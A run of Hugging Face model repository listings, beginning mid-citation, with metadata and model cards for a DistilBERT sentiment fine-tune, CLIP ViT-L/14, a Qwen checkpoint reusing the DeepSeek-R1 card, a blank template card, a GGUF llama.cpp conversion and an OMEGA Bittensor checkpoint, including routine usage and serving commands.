Quentin Gallouédec}, year = 2020, journal = {GitHub repository}, publisher = {GitHub}, howpublished = {\url{https://github.com/huggingface/trl}} } ```
sai17/distilbert-base-uncased-finetuned-Sentiment
sai17
2025-05-30T08:01:57Z
0
0
transformers
[ "transformers", "tensorboard", "safetensors", "distilbert", "text-classification", "generated_from_trainer", "base_model:distilbert/distilbert-base-uncased", "base_model:finetune:distilbert/distilbert-base-uncased", "license:apache-2.0", "autotrain_compatible", "endpoints_compatible", "region:us" ]
text-classification
2025-05-30T06:28:22Z
--- library_name: transformers license: apache-2.0 base_model: distilbert-base-uncased tags: - generated_from_trainer metrics: - accuracy - f1 model-index: - name: distilbert-base-uncased-finetuned-Sentiment results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> # distilbert-base-uncased-finetuned-Sentiment This model is a fine-tuned version of [distilbert-base-uncased](https://huggingface.co/distilbert-base-uncased) on the None dataset. It achieves the following results on the evaluation set: - Loss: 0.0021 - Accuracy: 1.0 - F1: 1.0 ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 2e-05 - train_batch_size: 64 - eval_batch_size: 64 - seed: 42 - optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: linear - num_epochs: 10 ### Training results | Training Loss | Epoch | Step | Validation Loss | Accuracy | F1 | |:-------------:|:-----:|:----:|:---------------:|:--------:|:---:| | 0.0043 | 1.0 | 29 | 0.0040 | 1.0 | 1.0 | | 0.0032 | 2.0 | 58 | 0.0034 | 1.0 | 1.0 | | 0.0025 | 3.0 | 87 | 0.0032 | 1.0 | 1.0 | | 0.0021 | 4.0 | 116 | 0.0025 | 1.0 | 1.0 | | 0.0019 | 5.0 | 145 | 0.0023 | 1.0 | 1.0 | | 0.0017 | 6.0 | 174 | 0.0023 | 1.0 | 1.0 | | 0.0016 | 7.0 | 203 | 0.0022 | 1.0 | 1.0 | | 0.0015 | 8.0 | 232 | 0.0022 | 1.0 | 1.0 | | 0.0014 | 9.0 | 261 | 0.0021 | 1.0 | 1.0 | | 0.0014 | 10.0 | 290 | 0.0021 | 1.0 | 1.0 | ### Framework versions - Transformers 4.52.2 - Pytorch 2.6.0+cu124 - Datasets 2.14.4 - Tokenizers 0.21.1
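The card above does not show inference code, so here is a small, hedged example of loading the classifier with the `pipeline` API; the input sentence is arbitrary, and the label names depend on how the training labels were mapped, which the card does not specify.

```python
# Small inference example for the fine-tuned classifier. The label ids map to whatever
# sentiment classes were used during fine-tuning, which the card does not document.
from transformers import pipeline

classifier = pipeline("text-classification", model="sai17/distilbert-base-uncased-finetuned-Sentiment")
print(classifier("The battery life on this phone is fantastic."))
# e.g. [{'label': 'LABEL_1', 'score': 0.99}] -- label naming depends on the training setup
```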
lelerjosy1137/yuyu
lelerjosy1137
2025-05-30T08:00:40Z
0
0
null
[ "license:apache-2.0", "region:us" ]
null
2025-05-30T08:00:38Z
--- license: apache-2.0 ---
RedbeardNZ/clip-vit-large-patch14
RedbeardNZ
2025-05-30T07:59:01Z
0
0
null
[ "pytorch", "tf", "jax", "safetensors", "clip", "vision", "arxiv:2103.00020", "arxiv:1908.04913", "region:us" ]
null
2025-05-30T07:59:01Z
--- tags: - vision widget: - src: https://huggingface.co/datasets/mishig/sample_images/resolve/main/cat-dog-music.png candidate_labels: playing music, playing sports example_title: Cat & Dog --- # Model Card: CLIP Disclaimer: The model card is taken and modified from the official CLIP repository, it can be found [here](https://github.com/openai/CLIP/blob/main/model-card.md). ## Model Details The CLIP model was developed by researchers at OpenAI to learn about what contributes to robustness in computer vision tasks. The model was also developed to test the ability of models to generalize to arbitrary image classification tasks in a zero-shot manner. It was not developed for general model deployment - to deploy models like CLIP, researchers will first need to carefully study their capabilities in relation to the specific context they’re being deployed within. ### Model Date January 2021 ### Model Type The base model uses a ViT-L/14 Transformer architecture as an image encoder and uses a masked self-attention Transformer as a text encoder. These encoders are trained to maximize the similarity of (image, text) pairs via a contrastive loss. The original implementation had two variants: one using a ResNet image encoder and the other using a Vision Transformer. This repository has the variant with the Vision Transformer. ### Documents - [Blog Post](https://openai.com/blog/clip/) - [CLIP Paper](https://arxiv.org/abs/2103.00020) ### Use with Transformers ```python from PIL import Image import requests from transformers import CLIPProcessor, CLIPModel model = CLIPModel.from_pretrained("openai/clip-vit-large-patch14") processor = CLIPProcessor.from_pretrained("openai/clip-vit-large-patch14") url = "http://images.cocodataset.org/val2017/000000039769.jpg" image = Image.open(requests.get(url, stream=True).raw) inputs = processor(text=["a photo of a cat", "a photo of a dog"], images=image, return_tensors="pt", padding=True) outputs = model(**inputs) logits_per_image = outputs.logits_per_image # this is the image-text similarity score probs = logits_per_image.softmax(dim=1) # we can take the softmax to get the label probabilities ``` ## Model Use ### Intended Use The model is intended as a research output for research communities. We hope that this model will enable researchers to better understand and explore zero-shot, arbitrary image classification. We also hope it can be used for interdisciplinary studies of the potential impact of such models - the CLIP paper includes a discussion of potential downstream impacts to provide an example for this sort of analysis. #### Primary intended uses The primary intended users of these models are AI researchers. We primarily imagine the model will be used by researchers to better understand robustness, generalization, and other capabilities, biases, and constraints of computer vision models. ### Out-of-Scope Use Cases **Any** deployed use case of the model - whether commercial or not - is currently out of scope. Non-deployed use cases such as image search in a constrained environment, are also not recommended unless there is thorough in-domain testing of the model with a specific, fixed class taxonomy. This is because our safety assessment demonstrated a high need for task specific testing especially given the variability of CLIP’s performance with different class taxonomies. This makes untested and unconstrained deployment of the model in any use case currently potentially harmful. 
Certain use cases which would fall under the domain of surveillance and facial recognition are always out-of-scope regardless of performance of the model. This is because the use of artificial intelligence for tasks such as these can be premature currently given the lack of testing norms and checks to ensure its fair use. Since the model has not been purposefully trained in or evaluated on any languages other than English, its use should be limited to English language use cases. ## Data The model was trained on publicly available image-caption data. This was done through a combination of crawling a handful of websites and using commonly-used pre-existing image datasets such as [YFCC100M](http://projects.dfki.uni-kl.de/yfcc100m/). A large portion of the data comes from our crawling of the internet. This means that the data is more representative of people and societies most connected to the internet which tend to skew towards more developed nations, and younger, male users. ### Data Mission Statement Our goal with building this dataset was to test out robustness and generalizability in computer vision tasks. As a result, the focus was on gathering large quantities of data from different publicly-available internet data sources. The data was gathered in a mostly non-interventionist manner. However, we only crawled websites that had policies against excessively violent and adult images and allowed us to filter out such content. We do not intend for this dataset to be used as the basis for any commercial or deployed model and will not be releasing the dataset. ## Performance and Limitations ### Performance We have evaluated the performance of CLIP on a wide range of benchmarks across a variety of computer vision datasets such as OCR to texture recognition to fine-grained classification. The paper describes model performance on the following datasets: - Food101 - CIFAR10 - CIFAR100 - Birdsnap - SUN397 - Stanford Cars - FGVC Aircraft - VOC2007 - DTD - Oxford-IIIT Pet dataset - Caltech101 - Flowers102 - MNIST - SVHN - IIIT5K - Hateful Memes - SST-2 - UCF101 - Kinetics700 - Country211 - CLEVR Counting - KITTI Distance - STL-10 - RareAct - Flickr30 - MSCOCO - ImageNet - ImageNet-A - ImageNet-R - ImageNet Sketch - ObjectNet (ImageNet Overlap) - Youtube-BB - ImageNet-Vid ## Limitations CLIP and our analysis of it have a number of limitations. CLIP currently struggles with respect to certain tasks such as fine grained classification and counting objects. CLIP also poses issues with regards to fairness and bias which we discuss in the paper and briefly in the next section. Additionally, our approach to testing CLIP also has an important limitation- in many cases we have used linear probes to evaluate the performance of CLIP and there is evidence suggesting that linear probes can underestimate model performance. ### Bias and Fairness We find that the performance of CLIP - and the specific biases it exhibits - can depend significantly on class design and the choices one makes for categories to include and exclude. We tested the risk of certain kinds of denigration with CLIP by classifying images of people from [Fairface](https://arxiv.org/abs/1908.04913) into crime-related and non-human animal categories. We found significant disparities with respect to race and gender. Additionally, we found that these disparities could shift based on how the classes were constructed. (Details captured in the Broader Impacts Section in the paper). 
We also tested the performance of CLIP on gender, race and age classification using the Fairface dataset (We default to using race categories as they are constructed in the Fairface dataset.) in order to assess quality of performance across different demographics. We found accuracy >96% across all races for gender classification with ‘Middle Eastern’ having the highest accuracy (98.4%) and ‘White’ having the lowest (96.5%). Additionally, CLIP averaged ~93% for racial classification and ~63% for age classification. Our use of evaluations to test for gender, race and age classification as well as denigration harms is simply to evaluate performance of the model across people and surface potential risks and not to demonstrate an endorsement/enthusiasm for such tasks. ## Feedback ### Where to send questions or comments about the model Please use [this Google Form](https://forms.gle/Uv7afRH5dvY34ZEs9)
Jackmin108/qwen-7b-rl-step-1
Jackmin108
2025-05-30T07:57:48Z
0
0
transformers
[ "transformers", "safetensors", "qwen2", "text-generation", "conversational", "arxiv:2501.12948", "license:mit", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-05-30T05:03:06Z
--- license: mit library_name: transformers --- # DeepSeek-R1 <!-- markdownlint-disable first-line-h1 --> <!-- markdownlint-disable html --> <!-- markdownlint-disable no-duplicate-header --> <div align="center"> <img src="https://github.com/deepseek-ai/DeepSeek-V2/blob/main/figures/logo.svg?raw=true" width="60%" alt="DeepSeek-V3" /> </div> <hr> <div align="center" style="line-height: 1;"> <a href="https://www.deepseek.com/" target="_blank" style="margin: 2px;"> <img alt="Homepage" src="https://github.com/deepseek-ai/DeepSeek-V2/blob/main/figures/badge.svg?raw=true" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://chat.deepseek.com/" target="_blank" style="margin: 2px;"> <img alt="Chat" src="https://img.shields.io/badge/🤖%20Chat-DeepSeek%20R1-536af5?color=536af5&logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://huggingface.co/deepseek-ai" target="_blank" style="margin: 2px;"> <img alt="Hugging Face" src="https://img.shields.io/badge/%F0%9F%A4%97%20Hugging%20Face-DeepSeek%20AI-ffc107?color=ffc107&logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> </div> <div align="center" style="line-height: 1;"> <a href="https://discord.gg/Tc7c45Zzu5" target="_blank" style="margin: 2px;"> <img alt="Discord" src="https://img.shields.io/badge/Discord-DeepSeek%20AI-7289da?logo=discord&logoColor=white&color=7289da" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://github.com/deepseek-ai/DeepSeek-V2/blob/main/figures/qr.jpeg?raw=true" target="_blank" style="margin: 2px;"> <img alt="Wechat" src="https://img.shields.io/badge/WeChat-DeepSeek%20AI-brightgreen?logo=wechat&logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://twitter.com/deepseek_ai" target="_blank" style="margin: 2px;"> <img alt="Twitter Follow" src="https://img.shields.io/badge/Twitter-deepseek_ai-white?logo=x&logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> </div> <div align="center" style="line-height: 1;"> <a href="https://github.com/deepseek-ai/DeepSeek-R1/blob/main/LICENSE" style="margin: 2px;"> <img alt="License" src="https://img.shields.io/badge/License-MIT-f5de53?&color=f5de53" style="display: inline-block; vertical-align: middle;"/> </a> </div> <p align="center"> <a href="https://github.com/deepseek-ai/DeepSeek-R1/blob/main/DeepSeek_R1.pdf"><b>Paper Link</b>👁️</a> </p> ## 1. Introduction We introduce our first-generation reasoning models, DeepSeek-R1-Zero and DeepSeek-R1. DeepSeek-R1-Zero, a model trained via large-scale reinforcement learning (RL) without supervised fine-tuning (SFT) as a preliminary step, demonstrated remarkable performance on reasoning. With RL, DeepSeek-R1-Zero naturally emerged with numerous powerful and interesting reasoning behaviors. However, DeepSeek-R1-Zero encounters challenges such as endless repetition, poor readability, and language mixing. To address these issues and further enhance reasoning performance, we introduce DeepSeek-R1, which incorporates cold-start data before RL. DeepSeek-R1 achieves performance comparable to OpenAI-o1 across math, code, and reasoning tasks. To support the research community, we have open-sourced DeepSeek-R1-Zero, DeepSeek-R1, and six dense models distilled from DeepSeek-R1 based on Llama and Qwen. DeepSeek-R1-Distill-Qwen-32B outperforms OpenAI-o1-mini across various benchmarks, achieving new state-of-the-art results for dense models. 
**NOTE: Before running DeepSeek-R1 series models locally, we kindly recommend reviewing the [Usage Recommendation](#usage-recommendations) section.** <p align="center"> <img width="80%" src="figures/benchmark.jpg"> </p> ## 2. Model Summary --- **Post-Training: Large-Scale Reinforcement Learning on the Base Model** - We directly apply reinforcement learning (RL) to the base model without relying on supervised fine-tuning (SFT) as a preliminary step. This approach allows the model to explore chain-of-thought (CoT) for solving complex problems, resulting in the development of DeepSeek-R1-Zero. DeepSeek-R1-Zero demonstrates capabilities such as self-verification, reflection, and generating long CoTs, marking a significant milestone for the research community. Notably, it is the first open research to validate that reasoning capabilities of LLMs can be incentivized purely through RL, without the need for SFT. This breakthrough paves the way for future advancements in this area. - We introduce our pipeline to develop DeepSeek-R1. The pipeline incorporates two RL stages aimed at discovering improved reasoning patterns and aligning with human preferences, as well as two SFT stages that serve as the seed for the model's reasoning and non-reasoning capabilities. We believe the pipeline will benefit the industry by creating better models. --- **Distillation: Smaller Models Can Be Powerful Too** - We demonstrate that the reasoning patterns of larger models can be distilled into smaller models, resulting in better performance compared to the reasoning patterns discovered through RL on small models. The open source DeepSeek-R1, as well as its API, will benefit the research community to distill better smaller models in the future. - Using the reasoning data generated by DeepSeek-R1, we fine-tuned several dense models that are widely used in the research community. The evaluation results demonstrate that the distilled smaller dense models perform exceptionally well on benchmarks. We open-source distilled 1.5B, 7B, 8B, 14B, 32B, and 70B checkpoints based on Qwen2.5 and Llama3 series to the community. ## 3. Model Downloads ### DeepSeek-R1 Models <div align="center"> | **Model** | **#Total Params** | **#Activated Params** | **Context Length** | **Download** | | :------------: | :------------: | :------------: | :------------: | :------------: | | DeepSeek-R1-Zero | 671B | 37B | 128K | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Zero) | | DeepSeek-R1 | 671B | 37B | 128K | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1) | </div> DeepSeek-R1-Zero & DeepSeek-R1 are trained based on DeepSeek-V3-Base. For more details regarding the model architecture, please refer to [DeepSeek-V3](https://github.com/deepseek-ai/DeepSeek-V3) repository. 
### DeepSeek-R1-Distill Models <div align="center"> | **Model** | **Base Model** | **Download** | | :------------: | :------------: | :------------: | | DeepSeek-R1-Distill-Qwen-1.5B | [Qwen2.5-Math-1.5B](https://huggingface.co/Qwen/Qwen2.5-Math-1.5B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Qwen-1.5B) | | DeepSeek-R1-Distill-Qwen-7B | [Qwen2.5-Math-7B](https://huggingface.co/Qwen/Qwen2.5-Math-7B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Qwen-7B) | | DeepSeek-R1-Distill-Llama-8B | [Llama-3.1-8B](https://huggingface.co/meta-llama/Llama-3.1-8B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Llama-8B) | | DeepSeek-R1-Distill-Qwen-14B | [Qwen2.5-14B](https://huggingface.co/Qwen/Qwen2.5-14B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Qwen-14B) | |DeepSeek-R1-Distill-Qwen-32B | [Qwen2.5-32B](https://huggingface.co/Qwen/Qwen2.5-32B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Qwen-32B) | | DeepSeek-R1-Distill-Llama-70B | [Llama-3.3-70B-Instruct](https://huggingface.co/meta-llama/Llama-3.3-70B-Instruct) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Llama-70B) | </div> DeepSeek-R1-Distill models are fine-tuned based on open-source models, using samples generated by DeepSeek-R1. We slightly change their configs and tokenizers. Please use our setting to run these models. ## 4. Evaluation Results ### DeepSeek-R1-Evaluation For all our models, the maximum generation length is set to 32,768 tokens. For benchmarks requiring sampling, we use a temperature of $0.6$, a top-p value of $0.95$, and generate 64 responses per query to estimate pass@1. <div align="center"> | Category | Benchmark (Metric) | Claude-3.5-Sonnet-1022 | GPT-4o 0513 | DeepSeek V3 | OpenAI o1-mini | OpenAI o1-1217 | DeepSeek R1 | |----------|-------------------|----------------------|------------|--------------|----------------|------------|--------------| | | Architecture | - | - | MoE | - | - | MoE | | | # Activated Params | - | - | 37B | - | - | 37B | | | # Total Params | - | - | 671B | - | - | 671B | | English | MMLU (Pass@1) | 88.3 | 87.2 | 88.5 | 85.2 | **91.8** | 90.8 | | | MMLU-Redux (EM) | 88.9 | 88.0 | 89.1 | 86.7 | - | **92.9** | | | MMLU-Pro (EM) | 78.0 | 72.6 | 75.9 | 80.3 | - | **84.0** | | | DROP (3-shot F1) | 88.3 | 83.7 | 91.6 | 83.9 | 90.2 | **92.2** | | | IF-Eval (Prompt Strict) | **86.5** | 84.3 | 86.1 | 84.8 | - | 83.3 | | | GPQA-Diamond (Pass@1) | 65.0 | 49.9 | 59.1 | 60.0 | **75.7** | 71.5 | | | SimpleQA (Correct) | 28.4 | 38.2 | 24.9 | 7.0 | **47.0** | 30.1 | | | FRAMES (Acc.) | 72.5 | 80.5 | 73.3 | 76.9 | - | **82.5** | | | AlpacaEval2.0 (LC-winrate) | 52.0 | 51.1 | 70.0 | 57.8 | - | **87.6** | | | ArenaHard (GPT-4-1106) | 85.2 | 80.4 | 85.5 | 92.0 | - | **92.3** | | Code | LiveCodeBench (Pass@1-COT) | 33.8 | 34.2 | - | 53.8 | 63.4 | **65.9** | | | Codeforces (Percentile) | 20.3 | 23.6 | 58.7 | 93.4 | **96.6** | 96.3 | | | Codeforces (Rating) | 717 | 759 | 1134 | 1820 | **2061** | 2029 | | | SWE Verified (Resolved) | **50.8** | 38.8 | 42.0 | 41.6 | 48.9 | 49.2 | | | Aider-Polyglot (Acc.) 
| 45.3 | 16.0 | 49.6 | 32.9 | **61.7** | 53.3 | | Math | AIME 2024 (Pass@1) | 16.0 | 9.3 | 39.2 | 63.6 | 79.2 | **79.8** | | | MATH-500 (Pass@1) | 78.3 | 74.6 | 90.2 | 90.0 | 96.4 | **97.3** | | | CNMO 2024 (Pass@1) | 13.1 | 10.8 | 43.2 | 67.6 | - | **78.8** | | Chinese | CLUEWSC (EM) | 85.4 | 87.9 | 90.9 | 89.9 | - | **92.8** | | | C-Eval (EM) | 76.7 | 76.0 | 86.5 | 68.9 | - | **91.8** | | | C-SimpleQA (Correct) | 55.4 | 58.7 | **68.0** | 40.3 | - | 63.7 | </div> ### Distilled Model Evaluation <div align="center"> | Model | AIME 2024 pass@1 | AIME 2024 cons@64 | MATH-500 pass@1 | GPQA Diamond pass@1 | LiveCodeBench pass@1 | CodeForces rating | |------------------------------------------|------------------|-------------------|-----------------|----------------------|----------------------|-------------------| | GPT-4o-0513 | 9.3 | 13.4 | 74.6 | 49.9 | 32.9 | 759 | | Claude-3.5-Sonnet-1022 | 16.0 | 26.7 | 78.3 | 65.0 | 38.9 | 717 | | o1-mini | 63.6 | 80.0 | 90.0 | 60.0 | 53.8 | **1820** | | QwQ-32B-Preview | 44.0 | 60.0 | 90.6 | 54.5 | 41.9 | 1316 | | DeepSeek-R1-Distill-Qwen-1.5B | 28.9 | 52.7 | 83.9 | 33.8 | 16.9 | 954 | | DeepSeek-R1-Distill-Qwen-7B | 55.5 | 83.3 | 92.8 | 49.1 | 37.6 | 1189 | | DeepSeek-R1-Distill-Qwen-14B | 69.7 | 80.0 | 93.9 | 59.1 | 53.1 | 1481 | | DeepSeek-R1-Distill-Qwen-32B | **72.6** | 83.3 | 94.3 | 62.1 | 57.2 | 1691 | | DeepSeek-R1-Distill-Llama-8B | 50.4 | 80.0 | 89.1 | 49.0 | 39.6 | 1205 | | DeepSeek-R1-Distill-Llama-70B | 70.0 | **86.7** | **94.5** | **65.2** | **57.5** | 1633 | </div> ## 5. Chat Website & API Platform You can chat with DeepSeek-R1 on DeepSeek's official website: [chat.deepseek.com](https://chat.deepseek.com), and switch on the button "DeepThink" We also provide OpenAI-Compatible API at DeepSeek Platform: [platform.deepseek.com](https://platform.deepseek.com/) ## 6. How to Run Locally ### DeepSeek-R1 Models Please visit [DeepSeek-V3](https://github.com/deepseek-ai/DeepSeek-V3) repo for more information about running DeepSeek-R1 locally. **NOTE: Hugging Face's Transformers has not been directly supported yet.** ### DeepSeek-R1-Distill Models DeepSeek-R1-Distill models can be utilized in the same manner as Qwen or Llama models. For instance, you can easily start a service using [vLLM](https://github.com/vllm-project/vllm): ```shell vllm serve deepseek-ai/DeepSeek-R1-Distill-Qwen-32B --tensor-parallel-size 2 --max-model-len 32768 --enforce-eager ``` You can also easily start a service using [SGLang](https://github.com/sgl-project/sglang) ```bash python3 -m sglang.launch_server --model deepseek-ai/DeepSeek-R1-Distill-Qwen-32B --trust-remote-code --tp 2 ``` ### Usage Recommendations **We recommend adhering to the following configurations when utilizing the DeepSeek-R1 series models, including benchmarking, to achieve the expected performance:** 1. Set the temperature within the range of 0.5-0.7 (0.6 is recommended) to prevent endless repetitions or incoherent outputs. 2. **Avoid adding a system prompt; all instructions should be contained within the user prompt.** 3. For mathematical problems, it is advisable to include a directive in your prompt such as: "Please reason step by step, and put your final answer within \boxed{}." 4. When evaluating model performance, it is recommended to conduct multiple tests and average the results. 
Additionally, we have observed that the DeepSeek-R1 series models tend to bypass the thinking pattern (i.e., outputting "\<think\>\n\n\</think\>") when responding to certain queries, which can adversely affect the model's performance. **To ensure that the model engages in thorough reasoning, we recommend forcing the model to initiate its response with "\<think\>\n" at the beginning of every output.** ## 7. License This code repository and the model weights are licensed under the [MIT License](https://github.com/deepseek-ai/DeepSeek-R1/blob/main/LICENSE). The DeepSeek-R1 series supports commercial use and allows for any modifications and derivative works, including, but not limited to, distillation for training other LLMs. Please note that: - DeepSeek-R1-Distill-Qwen-1.5B, DeepSeek-R1-Distill-Qwen-7B, DeepSeek-R1-Distill-Qwen-14B and DeepSeek-R1-Distill-Qwen-32B are derived from the [Qwen-2.5 series](https://github.com/QwenLM/Qwen2.5), which are originally licensed under the [Apache 2.0 License](https://huggingface.co/Qwen/Qwen2.5-1.5B/blob/main/LICENSE), and are now finetuned with 800k samples curated with DeepSeek-R1. - DeepSeek-R1-Distill-Llama-8B is derived from Llama3.1-8B-Base and is originally licensed under the [llama3.1 license](https://huggingface.co/meta-llama/Llama-3.1-8B/blob/main/LICENSE). - DeepSeek-R1-Distill-Llama-70B is derived from Llama3.3-70B-Instruct and is originally licensed under the [llama3.3 license](https://huggingface.co/meta-llama/Llama-3.3-70B-Instruct/blob/main/LICENSE). ## 8. Citation ``` @misc{deepseekai2025deepseekr1incentivizingreasoningcapability, title={DeepSeek-R1: Incentivizing Reasoning Capability in LLMs via Reinforcement Learning}, author={DeepSeek-AI}, year={2025}, eprint={2501.12948}, archivePrefix={arXiv}, primaryClass={cs.CL}, url={https://arxiv.org/abs/2501.12948}, } ``` ## 9. Contact If you have any questions, please raise an issue or contact us at [[email protected]]([email protected]).
CHOOSEIT/MCQA_rsLoRA_DoRA_SM1AR_5E
CHOOSEIT
2025-05-30T07:56:00Z
0
0
transformers
[ "transformers", "safetensors", "qwen3", "text-generation", "conversational", "arxiv:1910.09700", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-05-30T07:55:14Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. 
--> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
Bouquets/DeepSeek-R1-0528-Qwen3-8B-Q4_K_M-GGUF
Bouquets
2025-05-30T07:55:31Z
5
0
transformers
[ "transformers", "gguf", "llama-cpp", "gguf-my-repo", "base_model:deepseek-ai/DeepSeek-R1-0528-Qwen3-8B", "base_model:quantized:deepseek-ai/DeepSeek-R1-0528-Qwen3-8B", "license:mit", "endpoints_compatible", "region:us", "conversational" ]
null
2025-05-30T07:55:03Z
--- license: mit library_name: transformers tags: - llama-cpp - gguf-my-repo base_model: deepseek-ai/DeepSeek-R1-0528-Qwen3-8B --- # Bouquets/DeepSeek-R1-0528-Qwen3-8B-Q4_K_M-GGUF This model was converted to GGUF format from [`deepseek-ai/DeepSeek-R1-0528-Qwen3-8B`](https://huggingface.co/deepseek-ai/DeepSeek-R1-0528-Qwen3-8B) using llama.cpp via the ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space. Refer to the [original model card](https://huggingface.co/deepseek-ai/DeepSeek-R1-0528-Qwen3-8B) for more details on the model. ## Use with llama.cpp Install llama.cpp through brew (works on Mac and Linux) ```bash brew install llama.cpp ``` Invoke the llama.cpp server or the CLI. ### CLI: ```bash llama-cli --hf-repo Bouquets/DeepSeek-R1-0528-Qwen3-8B-Q4_K_M-GGUF --hf-file deepseek-r1-0528-qwen3-8b-q4_k_m.gguf -p "The meaning to life and the universe is" ``` ### Server: ```bash llama-server --hf-repo Bouquets/DeepSeek-R1-0528-Qwen3-8B-Q4_K_M-GGUF --hf-file deepseek-r1-0528-qwen3-8b-q4_k_m.gguf -c 2048 ``` Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well. Step 1: Clone llama.cpp from GitHub. ``` git clone https://github.com/ggerganov/llama.cpp ``` Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux). ``` cd llama.cpp && LLAMA_CURL=1 make ``` Step 3: Run inference through the main binary. ``` ./llama-cli --hf-repo Bouquets/DeepSeek-R1-0528-Qwen3-8B-Q4_K_M-GGUF --hf-file deepseek-r1-0528-qwen3-8b-q4_k_m.gguf -p "The meaning to life and the universe is" ``` or ``` ./llama-server --hf-repo Bouquets/DeepSeek-R1-0528-Qwen3-8B-Q4_K_M-GGUF --hf-file deepseek-r1-0528-qwen3-8b-q4_k_m.gguf -c 2048 ```
TOMFORD79/Tom9
TOMFORD79
2025-05-30T07:48:24Z
0
0
null
[ "safetensors", "any-to-any", "omega", "omegalabs", "bittensor", "agi", "license:mit", "region:us" ]
any-to-any
2025-05-30T07:40:55Z
--- license: mit tags: - any-to-any - omega - omegalabs - bittensor - agi --- This is an Any-to-Any model checkpoint for the OMEGA Labs x Bittensor Any-to-Any subnet. Check out the [git repo](https://github.com/omegalabsinc/omegalabs-anytoany-bittensor) and find OMEGA on X: [@omegalabsai](https://x.com/omegalabsai).
